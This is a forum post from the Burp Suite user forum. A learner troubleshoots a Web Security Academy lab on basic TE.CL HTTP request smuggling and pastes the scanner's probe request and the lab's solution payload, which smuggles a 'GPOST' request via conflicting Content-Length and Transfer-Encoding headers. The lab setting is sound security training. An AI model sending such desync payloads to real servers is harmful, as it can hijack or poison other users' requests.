The Burp Suite User Forum was discontinued on the 1st November 2024.

Burp Suite User Forum

For support requests, go to the Support Center. To discuss with other Burp users, head to our Discord page.

SUPPORT CENTER DISCORD

HTTP request smuggling, basic TE.CL vulnerability Lab Queries.

Pung | Last updated: Jun 11, 2023 03:42AM UTC

It seems that I still cannot exploit this vulnerability even though request smuggler picked it up in the scan. I have reused what the scanner used and still cannot get the desired result. I even went on to the solution to copy and pasted the solution to my repeater to replicate the vulnerability and still getting 200 back instead of the GPOST issue. Please let me know what I did wrong. really curious. This is the request made by the scanner which I reused in repeater. Not getting the error back. ``` POST / HTTP/1.1 Host: 0a7600cc04f7bab6802e1c2500f700ad.web-security-academy.net Cookie: session=sKiDOv38QeI0YfqdBneTeOXoTVRqnwgA; User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Upgrade-Insecure-Requests: 1 Sec-Fetch-Dest: document Sec-Fetch-Mode: navigate Sec-Fetch-Site: none Sec-Fetch-User: ?1 Te: trailers Content-Length: 12 Transfer-Encoding: chunked 2 0 ``` This is the solution I grep from the academy. Also not getting the GPOST. ``` POST / HTTP/1.1 Host: 0a7600cc04f7bab6802e1c2500f700ad.web-security-academy.net Content-Type: application/x-www-form-urlencoded Content-length: 4 Transfer-Encoding: chunked 5c GPOST / HTTP/1.1 Content-Type: application/x-www-form-urlencoded Content-Length: 15 x=1 0 ``` I have the newlines in the request already, I disabled update-content length and changed to HTTP/1.1 already. Not sure where I did wrong.

Dominyque, PortSwigger Agent | Last updated: Jun 12, 2023 12:56PM UTC